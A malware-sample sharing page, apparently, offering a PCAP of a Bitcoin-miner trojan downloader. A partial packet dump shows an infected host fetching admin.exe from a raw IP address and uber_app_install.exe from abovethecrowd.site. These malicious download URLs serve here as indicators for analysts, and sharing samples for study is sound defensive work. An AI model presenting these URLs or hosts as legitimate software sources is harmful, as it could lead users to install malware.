Text Example

abovethecrowd.site Bitcoin Miner Trojan Downloader Dropper Malware PCAP File Download Sample

Download Attachments

  • 1 pcap admin
    Date added: May 22, 2019 4:01 am Added by: admin File size: 1 MB Downloads: 26

https://www.virustotal.com/fr/file/d64503a8ef7cc902266dc0ff286cf02145931f2ce387010eb7e81c5a178766fa/analysis/

2019-05-21 22:58:08.538297 IP 10.1.10.162.53189 > 142.11.206.184.80: Flags [P.], seq 1:535, ack 1, win 16425, length 534: HTTP: GET /admin.exe HTTP/1.1
E..>a)@…&*
.
……..P^.`%…HP.@)#…GET /admin.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=214316-
Unless-Modified-Since: Wed, 15 May 2019 14:14:07 GMT
If-Range: “9aa00-588edc331c9c0”
Host: 142.11.206.184
Connection: Keep-Alive


.
…q+…Pi……… .{……………
2019-05-21 23:05:09.023374 IP 46.232.113.43.80 > 10.1.10.162.53171: Flags [S.], seq 2566676778, ack 1764681237, win 42340, options [mss 1460,nop,nop,sackOK,nop,wscale 12], length 0
E .4..@./…..q+
.
..P….a*i……d.r…………..
2019-05-21 23:05:09.023494 IP 10.1.10.162.53171 > 46.232.113.43.80: Flags [.], ack 1, win 16425, length 0
E..(M@..... . ...q+...Pi.....a+P.@).......... 2019-05-21 23:05:09.024219 IP 10.1.10.162.53171 > 46.232.113.43.80: Flags [P.], seq 1:454, ack 1, win 16425, length 453: HTTP: GET /download_app/uber_app_install.exe HTTP/1.1 E...N@…..
.
…q+…Pi…..a+P.@)h…GET /download_app/uber_app_install.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: abovethecrowd.site
Connection: Keep-Alive

2019-05-21 23:27:11.491216 IP 10.1.10.162.53251 > 209.197.3.15.80: Flags [P.], seq 415:835, ack 5890, win 16159, length 420: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
E…b.@…..
.
……..P ….d..P.?.qV..GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: /
Referer: http://elememory.com/cgi-sys/suspendedpage.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-21 23:27:11.503111 IP 209.197.3.15.80 > 10.1.10.162.53251: Flags [.], ack 835, win 60, length 0

.
…8….Pdj…….. ..y…………..
2019-05-21 23:27:11.688817 IP 173.236.56.186.80 > 10.1.10.162.53252: Flags [S.], seq 2929576111, ack 1684704917, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.4.K[..8.
.
..P……dj….r……………..
2019-05-21 23:27:11.689034 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [.], ack 1, win 16425, length 0
E..(b.@…..
.
…8….Pdj……P.@)9………
2019-05-21 23:27:11.689248 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [P.], seq 1:292, ack 1, win 16425, length 291: HTTP: GET /favicon.ico HTTP/1.1
E..Kb.@….l
.
…8….Pdj……P.@)….GET /favicon.ico HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: elememory.com
Connection: Keep-Alive

2019-05-21 23:27:11.742278 IP 173.236.56.186.80 > 10.1.10.162.53252: Flags [.], ack 292, win 237, length 0
E .(..@.4…..8.

.

Content-Type: text/html; charset=iso-8859-1


302 Found

2019-05-21 23:27:11.746919 IP 10.1.10.162.53252 > 173.236.56.186.80: Flags [P.], seq 292:597, ack 485, win 16304, length 305: HTTP: GET /cgi-sys/suspendedpage.cgi HTTP/1.1
E..Yb.@….]
.
…8….Pdj……P.?.^…GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: elememory.com
Connection: Keep-Alive

Leave a Reply